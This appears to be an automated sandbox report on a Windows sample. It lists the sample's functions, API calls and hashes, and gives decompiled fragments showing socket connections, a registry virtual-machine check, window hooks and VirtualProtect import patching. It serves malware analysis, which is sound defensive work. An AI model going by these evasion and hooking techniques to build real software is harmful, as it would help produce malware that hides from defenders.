Instruction ID: 09ac67a3bd9c10a45602b124807c0eb22f945dc5a0236c19e4400b8d32993f47
Opcode Fuzzy Hash: 34b3dd0ed6820cacfe108102cadd2f676e73a015503047924468694898d44d0d
Instruction Fuzzy Hash: 0A113636302B4196EB24DF12A894B5873A5FB88F80F998531DE5A47718DF38D99ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C68D9C, Relevance: 7.5, APIs: 5, Instructions: 48memorysynchronizationwindowCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00C69590), ref: 00C68DCE
CreateCompatibleDC.GDI32 ref: 00C68DE4
CreateCompatibleBitmap.GDI32 ref: 00C68DF6
SelectObject.GDI32(?,?,00000000,00C69590), ref: 00C68E08
CreateMutexA.KERNEL32(?,?,00000000,00C69590), ref: 00C68E19

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Create$Compatible$AllocBitmapHeapMutexObjectSelect
String ID:
API String ID: 533441823-0
Opcode ID: f0000555fde949887d5020d45287be6648f277f05ab8a5f5c9edd8689431a93c
Instruction ID: e63117a4506ae821bcc8161ead028060721324561f5fa089564f9d070aa75c0a
Opcode Fuzzy Hash: f0000555fde949887d5020d45287be6648f277f05ab8a5f5c9edd8689431a93c
Instruction Fuzzy Hash: A9112A76711B5082EB24CF26E84471977A5F788F84F588229DF8D43B18DF38D459C748

Uniqueness

Uniqueness Score: -1.00%

Function 00C6AFD0, Relevance: 7.5, APIs: 5, Instructions: 41networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00C6AFE9
connect.WS2_32 ref: 00C6B004
setsockopt.WS2_32 ref: 00C6B02D

Part of subcall function 00C6C840: setsockopt.WS2_32 ref: 00C6C864
Part of subcall function 00C6C840: setsockopt.WS2_32 ref: 00C6C885

shutdown.WS2_32 ref: 00C6B04E
closesocket.WS2_32 ref: 00C6B057

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: setsockopt$closesocketconnectshutdownsocket
String ID:
API String ID: 3842021557-0
Opcode ID: b7b94f5deee25e66946f8415531661a10960e7bf1573d31f98bc6243642d20a9
Instruction ID: 4711884653a4553e17120ef5a18c8aeb3275851a4cb1dd7ba5934d2df16a345e
Opcode Fuzzy Hash: b7b94f5deee25e66946f8415531661a10960e7bf1573d31f98bc6243642d20a9
Instruction Fuzzy Hash: 4A01927130064182EB209F11E884766A721FB85BB4F948324DE7647BE4EF3EC9888705

Uniqueness

Uniqueness Score: -1.00%

Function 00C76C5C, Relevance: 7.5, APIs: 5, Instructions: 29stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32 ref: 00C76C7A
lstrcatA.KERNEL32 ref: 00C76C8C
lstrcatA.KERNEL32 ref: 00C76CA2
OpenEventA.KERNEL32 ref: 00C76CB2
CloseHandle.KERNEL32 ref: 00C76CC5

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$CloseEventHandleOpenlstrcpy
String ID:
API String ID: 821562950-0
Opcode ID: dfa0ae42ccbf6692c93d556723b96de8f7dfc535e7ced0363a452f264ae07694
Instruction ID: 6c19d0e56daa2a905a6fecf9310477a6781b66e917a29524d25d0139c6bd89de
Opcode Fuzzy Hash: dfa0ae42ccbf6692c93d556723b96de8f7dfc535e7ced0363a452f264ae07694
Instruction Fuzzy Hash: B1014472304946D2FF258B14F8947DA7361FB88B88F84C222964E07A64DF3CC54EC748

Uniqueness

Uniqueness Score: -1.00%

Function 00C7D4E8, Relevance: 7.5, APIs: 5, Instructions: 28synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,00000000,00C7F6DA,?,?,00000000,00C7F8A9,?,?,?,00C6C267), ref: 00C7D4FD
WaitForSingleObject.KERNEL32(?,?,00000000,00C7F6DA,?,?,00000000,00C7F8A9,?,?,?,00C6C267), ref: 00C7D512
CloseHandle.KERNEL32(?,?,00000000,00C7F6DA,?,?,00000000,00C7F8A9,?,?,?,00C6C267), ref: 00C7D51F
CloseHandle.KERNEL32(?,?,00000000,00C7F6DA,?,?,00000000,00C7F8A9,?,?,?,00C6C267), ref: 00C7D539
CloseHandle.KERNEL32(?,?,00000000,00C7F6DA,?,?,00000000,00C7F8A9,?,?,?,00C6C267), ref: 00C7D553

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$EventObjectSingleWait
String ID:
API String ID: 2857295742-0
Opcode ID: 87d0e0c747dcab134f6c8fc9f1c45709c33c6a08fcfbd272cadd49876fb8f899
Instruction ID: 3f89336fc9bfaa37975bc66d70456ebc1c4db469d68ffcdc487f1ee77b4b5bd6
Opcode Fuzzy Hash: 87d0e0c747dcab134f6c8fc9f1c45709c33c6a08fcfbd272cadd49876fb8f899
Instruction Fuzzy Hash: 67F04FA2A0AE8482FF959F61D8547782360EF84F49F4883348E1F0A554CF3D50898765

Uniqueness

Uniqueness Score: -1.00%

Function 00C832C0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00C832E3

Part of subcall function 00C7BE5C: GetWindowRect.USER32 ref: 00C7BE65

MoveWindow.USER32 ref: 00C83390
RedrawWindow.USER32 ref: 00C833A8

Strings

gfff, xrefs: 00C83326

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Rect$MoveRedraw
String ID: gfff
API String ID: 3281031154-1553575800
Opcode ID: a1faa506de5f69b457bbd84acf5d60bcfff25791962edc4cbd8d13d8fe757d76
Instruction ID: e1983b3bd2bfe0297270212e07911212693b95c10f629d285303dcec47ae402f
Opcode Fuzzy Hash: a1faa506de5f69b457bbd84acf5d60bcfff25791962edc4cbd8d13d8fe757d76
Instruction Fuzzy Hash: 2721837222859187D728CF2AF444B1E7B61F3C4B94F549214FA6A87F64CF38DA058B04

Uniqueness

Uniqueness Score: -1.00%

Function 00C621B4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00C620AD), ref: 00C621F8
RegQueryValueExW.ADVAPI32 ref: 00C62239
RegCloseKey.ADVAPI32 ref: 00C62257

Strings

SYSTEM\CurrentControlSet\services\Disk\Enum, xrefs: 00C621E5

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: SYSTEM\CurrentControlSet\services\Disk\Enum
API String ID: 3677997916-1303479782
Opcode ID: 004432ba3de67efd4db382fd00b1024806ca88830e7239a14b5ea6bc1173265f
Instruction ID: 1b75e3b21278fc59474f7d01a0b56b5ff5c16636d465733cfd0095f874fc8962
Opcode Fuzzy Hash: 004432ba3de67efd4db382fd00b1024806ca88830e7239a14b5ea6bc1173265f
Instruction Fuzzy Hash: A701EDB2215B8086E7309B54F898B9A7365F784794F8092259B8D43F6AEF3CC14CCB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C69858, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 00C7BB64: GetParent.USER32 ref: 00C7BCA4

GetWindowInfo.USER32 ref: 00C69881
SetWindowLongPtrA.USER32 ref: 00C698AC
SetLayeredWindowAttributes.USER32 ref: 00C698C3

Strings

<, xrefs: 00C69876

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$AttributesInfoLayeredLongParent
String ID: <
API String ID: 1120277486-4251816714
Opcode ID: f0f8b66c568201314e22f365d3e712022d769a10de16235915620f5c3a508217
Instruction ID: 7a37914a1ce3f383d250b7a28f149fc49dbbfa8299d4fb7b5d3f7f3d2636fa25
Opcode Fuzzy Hash: f0f8b66c568201314e22f365d3e712022d769a10de16235915620f5c3a508217
Instruction Fuzzy Hash: 87F05E71700741C3EB305F15B405B696720EB9AB88F548164EE960BB99DF3DCA598B08

Uniqueness

Uniqueness Score: -1.00%

Function 00C7BD68, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18threadCOMMON

Download Yara Rule

APIs

memset.NTDLL(?,?,?,?,?,?,?,00000000,00C814C0), ref: 00C7BD7C
GetWindowThreadProcessId.USER32 ref: 00C7BD8E
GetGUIThreadInfo.USER32 ref: 00C7BD9B

Strings

H, xrefs: 00C7BD83

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Thread$InfoProcessWindowmemset
String ID: H
API String ID: 2955632527-2852464175
Opcode ID: 98bdd6957d2efa4d54d0e85e50882750046535e2c8441cb97e53c30274259f7f
Instruction ID: e942affab521cd2fb22299a0a971e8a875f963623e4a81d3fb47379352266957
Opcode Fuzzy Hash: 98bdd6957d2efa4d54d0e85e50882750046535e2c8441cb97e53c30274259f7f
Instruction Fuzzy Hash: 0FE0866271094482EB21DB27E84575D7361FBC8B45F948221D65E03A68DF3CC95DCB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C68B38, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,00C68866,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C68B43
GetProcAddress.KERNEL32(?,?,?,?,00C68866,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C68B53

Strings

RtlSetUnhandledExceptionFilter, xrefs: 00C68B4C
NTDLL.DLL, xrefs: 00C68B3C

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: NTDLL.DLL$RtlSetUnhandledExceptionFilter
API String ID: 1646373207-97048080
Opcode ID: 91ed791288103449da59674b4fcb09106c5e0380a861d7140b14df7f28e1b4b7
Instruction ID: 54b707fdc86cca12175037f6e7fb87ad6ef90b3978800d3a71a9a4f6f09c6980
Opcode Fuzzy Hash: 91ed791288103449da59674b4fcb09106c5e0380a861d7140b14df7f28e1b4b7
Instruction Fuzzy Hash: 69E04264622A00D1FA459B51FCA5B993360BB94B41FD8932AC40E42770EF3CC65ED704

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A184, Relevance: 6.4, APIs: 5, Instructions: 122memorystringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(?,?,?,?,?,00000000,?,?,?,00C68A52,?,?,?,?,?,00C61F56), ref: 00C7A22A
HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,00C68A52,?,?,?,?,?,00C61F56), ref: 00C7A2BE
HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,00C68A52,?,?,?,?,?,00C61F56), ref: 00C7A2D6
HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,00C68A52,?,?,?,?,?,00C61F56), ref: 00C7A2EE
HeapFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,00C68A52,?,?,?,?,?,00C61F56), ref: 00C7A306

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeHeap$lstrcmpi
String ID:
API String ID: 3326462632-0
Opcode ID: 8af70c186274995e2d309205c32f7d9d4e1aee669db6f0a3fd9f7c54be15a4a0
Instruction ID: eef09129009c3d9cf19ab2992c63c80f8bc2acbbb70b0104b4f4ef9543728885
Opcode Fuzzy Hash: 8af70c186274995e2d309205c32f7d9d4e1aee669db6f0a3fd9f7c54be15a4a0
Instruction Fuzzy Hash: B0416F26600B8085EB29DF6298407AE33B5F7C4F88F49C516DE6C53B1ADF39CA95C345

Uniqueness

Uniqueness Score: -1.00%

Function 00C69E84, Relevance: 6.1, APIs: 4, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00C69E84(void* __ecx, signed int __rax, long long __rbx, void* __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, long long _a8) {
				char _v15;
				short _v17;
				char _v21;
				char _v22;
				char _v24;
				void* __rdi;
				long _t21;
				char _t23;
				signed char _t26;
				signed int _t28;
				signed int _t29;
				void* _t37;
				signed int _t48;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				void* _t70;

				_t64 = __rbp;
				_t63 = __rsi;
				_t43 = __rax;
				_a8 = __rbx;
				_t62 = __rdx;
				if( *0xc95760 == 0) {
					L11:
					__eflags = 0;
					_t21 = CallNextHookEx(??, ??, ??, ??);
					L12:
					return _t21;
				}
				_t37 = __ecx - 3;
				if(_t37 == 0) {
					_v24 =  *"/0" & 0x0000ffff;
					_t23 =  *0xc89b9e; // 0x0
					_v22 = _t23;
					_v21 = 0;
					_v17 = 0;
					_v15 = 0;
					_t8 = _t43 + 0xa; // 0xa
					r8d = _t8;
					GetClassNameA(??, ??, ??);
					_t26 = E00C7BCD8(__r8,  &_v24, __rdx, __rsi, __rbp);
					__eflags = _t26 & 0x00000040;
					if((_t26 & 0x00000040) != 0) {
						_t54 =  *__r8;
						__eflags =  *(_t54 + 0x30) & 0x80cf0000;
						if(( *(_t54 + 0x30) & 0x80cf0000) != 0) {
							_t28 =  *(_t54 + 0x48);
							r8d = 0x80000;
							__eflags = r8d & _t28;
							if((r8d & _t28) == 0) {
								_t29 = _t28 | r8d;
								__eflags = _t29;
								 *(_t54 + 0x48) = _t29;
							}
						}
					}
					_t70 = _t62;
					_t21 = CallNextHookEx(??, ??, ??, ??);
					_t48 = _t43;
					__eflags = _t43;
					if(__eflags == 0) {
						_t52 =  *0xc95760; // 0x0
						E00C69814(3, __eflags, _t43, _t52, _t62, _t70);
						_t53 =  *0xc95760; // 0x0
						_t21 = E00C69C40(_t43, _t48, _t53, _t62, _t63, _t64,  &_v24);
					}
					L10:
					goto L12;
				}
				if(_t37 != 1) {
					goto L11;
				} else {
					CallNextHookEx();
					r8d = 1;
					_t48 = __rax;
					_t21 = E00C69DC0(4, __rax, __rdx, __rsi, __rbp);
					goto L10;
				}
			}

0x00c69e84
0x00c69e84
0x00c69e84
0x00c69e84
0x00c69e99
0x00c69e9c
0x00c69f98
0x00c69f9d
0x00c69fa2
0x00c69fa8
0x00c69fb2
0x00c69fb2
0x00c69ea4
0x00c69ea7
0x00c69eee
0x00c69ef6
0x00c69efc
0x00c69f02
0x00c69f06
0x00c69f0b
0x00c69f0f
0x00c69f0f
0x00c69f13
0x00c69f2c
0x00c69f31
0x00c69f33
0x00c69f35
0x00c69f38
0x00c69f3f
0x00c69f41
0x00c69f44
0x00c69f4a
0x00c69f4d
0x00c69f4f
0x00c69f4f
0x00c69f52
0x00c69f52
0x00c69f4d
0x00c69f3f
0x00c69f58
0x00c69f62
0x00c69f68
0x00c69f6b
0x00c69f6e
0x00c69f70
0x00c69f7a
0x00c69f7f
0x00c69f8e
0x00c69f8e
0x00c69f93
0x00000000
0x00c69f93
0x00c69eac
0x00000000
0x00c69eb2
0x00c69ebf
0x00c69ecc
0x00c69ed5
0x00c69ed8
0x00000000
0x00c69ed8

APIs

CallNextHookEx.USER32 ref: 00C69EBF

Part of subcall function 00C69DC0: EnterCriticalSection.KERNEL32 ref: 00C69DE5
Part of subcall function 00C69DC0: LeaveCriticalSection.KERNEL32 ref: 00C69E2A
Part of subcall function 00C69DC0: SetWindowLongPtrA.USER32 ref: 00C69E4D
Part of subcall function 00C69DC0: HeapFree.KERNEL32 ref: 00C69E66

GetClassNameA.USER32 ref: 00C69F13
CallNextHookEx.USER32 ref: 00C69F62
CallNextHookEx.USER32 ref: 00C69FA2

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CallHookNext$CriticalSection$ClassEnterFreeHeapLeaveLongNameWindow
String ID:
API String ID: 2202591129-0
Opcode ID: 4412b6e1efded87cf6ec26bccfae5f80ed80dcb5d8e7173f139ce0214f4e5171
Instruction ID: e1215e000294a238f42460941afcf45a1dd463ae8ee54e144fe029295da8155e
Opcode Fuzzy Hash: 4412b6e1efded87cf6ec26bccfae5f80ed80dcb5d8e7173f139ce0214f4e5171
Instruction Fuzzy Hash: D131262131464085EF30CFA6E58476AA765FB89BC8F58812AEE4CC7B98DF3CC605C705

Uniqueness

Uniqueness Score: -1.00%

Function 00C83EC8, Relevance: 6.1, APIs: 4, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 00C83F03
RegQueryValueExW.ADVAPI32 ref: 00C83F30
RegQueryValueExW.ADVAPI32 ref: 00C83F68
RegCloseKey.ADVAPI32 ref: 00C83FA8

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue$CloseOpen
String ID:
API String ID: 1586453840-0
Opcode ID: d74e9bd5505a694184b659cb81c579426c136a820e312998712310e51cb33151
Instruction ID: 4ffdc9a675480dd8b365a1676b9df645e8f5b54cf6237255f320c5646e8d3db1
Opcode Fuzzy Hash: d74e9bd5505a694184b659cb81c579426c136a820e312998712310e51cb33151
Instruction Fuzzy Hash: 2F318736B10B508AEB10DFA6D484BAD73B4FB48B88F044565EE5D57B08DF39CA49CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00C77F50, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,?,?,?,00000000,00C77EAD,?,?,?,?,00000000,00C78917), ref: 00C77F76
wsprintfA.USER32 ref: 00C78046

Strings

{%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 00C7802B
%08X-%04X-%04X-%04X-%08X%04X, xrefs: 00C78039

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocHeapwsprintf
String ID: %08X-%04X-%04X-%04X-%08X%04X${%08X-%04X-%04X-%04X-%08X%04X}
API String ID: 578682255-2243025055
Opcode ID: 1b2162af997491215a2ebdc3f0990350f031a022d24ddcb22048b07a24d00492
Instruction ID: 18fb3abc6f3230bd95104bc55185222388e1cd57f5552750fc481470536b09b4
Opcode Fuzzy Hash: 1b2162af997491215a2ebdc3f0990350f031a022d24ddcb22048b07a24d00492
Instruction Fuzzy Hash: CA21E9E26182E047E73A4B25B84072ABFE1E345782F048025FBEA82F55EA3CD514DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C831B4, Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00C831EE
GetWindowRect.USER32 ref: 00C831FB
GetWindowRect.USER32 ref: 00C83208

Part of subcall function 00C7BE5C: GetWindowRect.USER32 ref: 00C7BE65

MoveWindow.USER32 ref: 00C8329E

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Rect$Move
String ID:
API String ID: 460932116-0
Opcode ID: 1dbe4346d1e10b901c4433f86c8ca2dcf208ee7a7aa7a61ada99c80b82bd98c2
Instruction ID: c1a5ab84e3301957d501cbb5d3f63ea188acf6cafe40bfae40315022b58097a3
Opcode Fuzzy Hash: 1dbe4346d1e10b901c4433f86c8ca2dcf208ee7a7aa7a61ada99c80b82bd98c2
Instruction Fuzzy Hash: E9314B36B20650CEE710CF69E844BAD7771F348B88F648514DE1963B18CF39DA46CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C62714, Relevance: 6.1, APIs: 4, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00C62714(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v56;
				char _v72;
				void* __rdi;
				void* _t33;
				void* _t34;
				void* _t38;
				intOrPtr _t46;
				char* _t47;
				long long _t49;
				long long _t64;
				void* _t66;
				void* _t77;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t46 =  *((intOrPtr*)(__rdx + 0x3c));
				_t66 = __rcx;
				_t34 = 1;
				if( *((intOrPtr*)(__r9 + 0x20)) <= __rcx) {
					L11:
					return _t34;
				}
				_t47 = _t46 + __rcx;
				if( *((intOrPtr*)(__r9 + 0x20)) >= _t47) {
					goto L11;
				}
				if(r8d == 0) {
					_t34 = 0x1778;
					goto L11;
				}
				lstrlenA();
				E00C61E70();
				_t64 = _t47;
				if(_t47 == 0) {
					_t34 = 8;
					goto L11;
				}
				lstrcpyA();
				__imp__StrChrA();
				if(_t47 != 0) {
					 *_t47 = 0;
					_v72 = _t64;
					_v56 = _t47 + 1;
					_t49 =  *((intOrPtr*)(__rcx + 0x20));
					_v40 = _t49;
					GetModuleHandleA(??);
					if(_t49 != 0) {
						r8d = 0;
						_t33 = E00C62DA4(_t38, __rbx,  &_v72, _t49, _t64, __rcx, __r9, __r9, _t77);
						_t34 = _t33;
						if(_t33 == 0) {
							 *((long long*)(_t66 + 0x28)) = _v32;
							 *((long long*)(_t66 + 0x30)) = _v24;
						}
					}
				}
				E00C61E84();
				goto L11;
			}

0x00c62714
0x00c62719
0x00c6271e
0x00c62728
0x00c6272c
0x00c62732
0x00c62742
0x00c62805
0x00c6281c
0x00c6281c
0x00c6274f
0x00c62756
0x00000000
0x00000000
0x00c6275f
0x00c62800
0x00000000
0x00c62800
0x00c62769
0x00c62772
0x00c62777
0x00c6277d
0x00c627f9
0x00000000
0x00c627f9
0x00c62786
0x00c62792
0x00c6279b
0x00c6279d
0x00c627a6
0x00c627ab
0x00c627b0
0x00c627b4
0x00c627b9
0x00c627c2
0x00c627cc
0x00c627d2
0x00c627d7
0x00c627db
0x00c627e2
0x00c627eb
0x00c627eb
0x00c627db
0x00c627c2
0x00c627f2
0x00000000

APIs

lstrlenA.KERNEL32 ref: 00C62769
lstrcpyA.KERNEL32 ref: 00C62786
StrChrA.SHLWAPI ref: 00C62792
GetModuleHandleA.KERNEL32 ref: 00C627B9

Part of subcall function 00C62DA4: VirtualProtect.KERNEL32 ref: 00C62E0F
Part of subcall function 00C62DA4: VirtualProtect.KERNEL32 ref: 00C62EE4

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual$HandleModulelstrcpylstrlen
String ID:
API String ID: 763936189-0
Opcode ID: 281345c29ad92fabc9d1fc1fae91e742f8b7f8f999115a527bb6e79660b46c83
Instruction ID: cfbd847ff45cd2d05835cdaccb3e38bc741c355f9eaad3968acdc85f6f82a2a8
Opcode Fuzzy Hash: 281345c29ad92fabc9d1fc1fae91e742f8b7f8f999115a527bb6e79660b46c83
Instruction Fuzzy Hash: CF214636208B8082EB20DB12E884B69B3A0F78CB80F588625EE9E47B44DF38D855C710

Uniqueness

Uniqueness Score: -1.00%

Function 00C64B0C, Relevance: 6.1, APIs: 4, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E00C64B0C(void* __edi, void* __ebp, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long _a8, intOrPtr _a24, void* _a32) {
				char _v40;
				long long _v56;
				intOrPtr _v64;
				long long _v72;
				void* __rsi;
				void* __rbp;
				int _t16;
				void* _t25;
				int _t27;
				long long _t38;
				void* _t52;
				void* _t53;
				void* _t55;

				_t38 = __rbx;
				_t25 = __edi;
				_a8 = __rbx;
				_t53 = __rdx;
				_t52 = __rcx;
				_t16 = E00C64588(__rax, __rbx, __rcx,  &_v40, __rdx, _t55);
				_t28 = _t16;
				if(_t16 != 0) {
					L10:
					return _t16;
				} else {
					_t16 = E00C6412C(_t28, __rax, _t38, _t52, _t53, _t53, _t55);
					if(__rax != 0) {
						_t16 = E00C64458(_t16 - _t25, __rax, _t38, _t52);
						_t27 = _t16;
						if(_t16 != 0) {
							_t4 = _t38 + 1; // 0x1
							r8d = _t4;
							_v56 = _t38;
							r9d = 0;
							_v64 = 0x80;
							_v72 = 3;
							_t16 = CreateFileA(??, ??, ??, ??, ??, ??, ??);
